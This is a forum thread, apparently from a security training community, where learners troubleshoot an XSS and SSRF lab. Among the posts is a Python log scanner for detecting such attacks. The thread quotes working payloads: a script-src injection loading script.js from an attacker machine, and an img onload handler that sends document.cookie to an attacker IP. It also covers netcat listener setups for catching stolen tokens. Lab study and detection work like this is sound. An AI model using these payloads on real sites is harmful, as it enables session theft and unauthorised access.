Forum Discussion
- TillyCorless (Community Manager)
Hey johndoe321, I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution.
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
- johndoe321 (Bronze I)
I have done the following so far:
- Identify the wildcard cycles employee user ID & token
- Host the http server using the python module (port 8080)
- Create a script.js file w/ the code provided in the Briefing section w/ the XMLHttpRequest object's open method's url parameter set to /admin/token instead of /users/data (tried setting this many different things including http://{ip of employee machine}/admin/token, /{employee id}/{token})
- All the while having the nc -vnlp 5555 looping in an infinite while loop
On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page...
I have a feeling I am missing something in item 3 listed above - something not right w/ how I have the script.js payload set up...
Been stuck on this for way longer than I care to, any guidance would be greatly appreciated.
- CyberSharpe (Bronze III)
johndoe321, I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Rolled right in.
- johndoe321 (Bronze I)
Wow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit...
- natelott (Bronze I)
The key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts. Additionally, there are two steps to expose the data. One exposes the username and token cookie (questions 1 & 2) in the query parameters. The other displays the token in the html body. The example code snippets work with VERY minor modifications. One thing I did based on feedback from a peer was to wrap Netcat in a loop to keep it active in the terminal for subsequent requests.
- CyberSharpe (Bronze III)
Agreed.
Run the XSS exploit, ensuring your script allows this to loop with NC listening. Name and cookie given instantly. Then I hosted the payload using http.server and conducted SSRF, this time using a different port number and NC. This dropped the full body; then, after a CyberChef URLDecode, the answer is available.
The actual script doesn't need much work.
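The two-step flow natelott and CyberSharpe describe above (a stored remote-script injection in the message field, then a cookie/token exfiltration request) leaves traces a defender can look for in the application's request logs. The following is an added example, not code from the lab or from anyone in this thread; the log format, the sample lines, the 203.0.113.9 address and the trusted_hosts allowlist are all constructed for illustration.

```python
"""Flag XSS script injection and cookie/token exfiltration in a simple request log."""
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample log: "METHOD PATH [body=<url-encoded form body>]" (not real lab data).
SAMPLE_LOG = [
    "POST /ask body=message%3DCan%20you%20help%20with%20lab%203%3F",
    "POST /ask body=message%3D%3Cscript%20src%3D%22http%3A%2F%2F203.0.113.9%3A8080%2Fscript.js%22%3E%3C%2Fscript%3E",
    "GET /admin/token",
    "GET /collect?session=abc123;user=employee42",
    "POST /ask body=message%3D%3Cimg%20src%3Dx%20onerror%3D%22this.src%3D%27http%3A%2F%2F203.0.113.9%2F%3F%27%2Bdocument.cookie%22%3E",
]

# <script src="http://..."> pointing at an external host (stored remote-script injection).
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)
# Inline event handler whose code reads document.cookie (exfiltration primitive).
HANDLER_COOKIE = re.compile(r"\bon\w+\s*=[^>]*document\.cookie", re.I)
# Query-parameter names that should never carry a credential.
SENSITIVE_PARAMS = {"session", "token", "cookie"}


def parse_line(line):
    """Split one log line into (method, path, decoded query, decoded body)."""
    parts = line.split(" ", 2)
    method, target = parts[0], parts[1]
    body = ""
    if len(parts) == 3 and parts[2].startswith("body="):
        body = unquote(parts[2][len("body="):])
    split = urlsplit(target)
    return method, split.path, unquote(split.query), body


def analyze_line(line, trusted_hosts=("app.example",)):
    """Return finding labels for one line; trusted_hosts is an assumed allowlist of script origins."""
    _method, _path, query, body = parse_line(line)
    findings = []
    m = SCRIPT_SRC.search(body)
    if m and urlsplit(m.group(1)).hostname not in trusted_hosts:
        findings.append("remote-script-injection")
    if HANDLER_COOKIE.search(body):
        findings.append("cookie-exfil-handler")
    if query:
        names = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
        # A cookie string forwarded as-is shows up as "name=value;name=value" in the query.
        if names & SENSITIVE_PARAMS or (";" in query and "=" in query):
            findings.append("credential-in-query")
    return findings


def scan(lines):
    """Map line index -> findings for every line that triggered at least one rule."""
    return {i: f for i, f in ((i, analyze_line(l)) for i, l in enumerate(lines)) if f}
```

Running `scan(SAMPLE_LOG)` flags the injected script tag, the onerror handler and the request carrying a session value in its query string, while the plain question and the bare /admin/token request pass.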
- NyePrior (Immerser)
- natelott (Bronze I)
NyePrior, thanks for the reply. I also tried this method. I used the IP address from ifconfig, localhost (127.0.0.1), and 0.0.0.0 and got the same result. If that were the case, how am I able to open the js file in the browser using the http://0.0.0.0:8080/script.js url? The JS is executing when I expose the vulnerability and I can see the request happen in netcat... Therefore I feel confident that the issue is inside the js file or with the /admin/token itself. I have tried the python method and the netcat method. The /admin/token endpoint gets me a 302 permanent redirect. As a python full stack developer w/ a good understanding of accessing localhost as a local web server... I think I'm missing something else or not understanding the flow completely.
- natelott (Bronze I)
Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.
Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.
Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>
- me5382 (Bronze I)
I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code.
I tried running the hint from below as well as the following:
<script src="http://0.0.0.0:8080/script.js"></script>
My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).
I am sure I must be misunderstanding something; any help would be appreciated.
- KieranRowley (Community Manager)
Hi shubham, did the information above help?
If so, please don't forget to mark it as a Solution.
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
- ChrisKershaw (Community Support)
Hey shubham,
Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt.
I'll be happy to share a hint to help you with your lab attempt:
In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>
Will you see if this helps you with your attempt?
- KieranRowley (Community Manager)
Hi shubham, welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
- shubham (Bronze I)
Thanks for the welcome.
So I tried using netcat with the payload in the message to make a reverse connection.
Payload: <img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>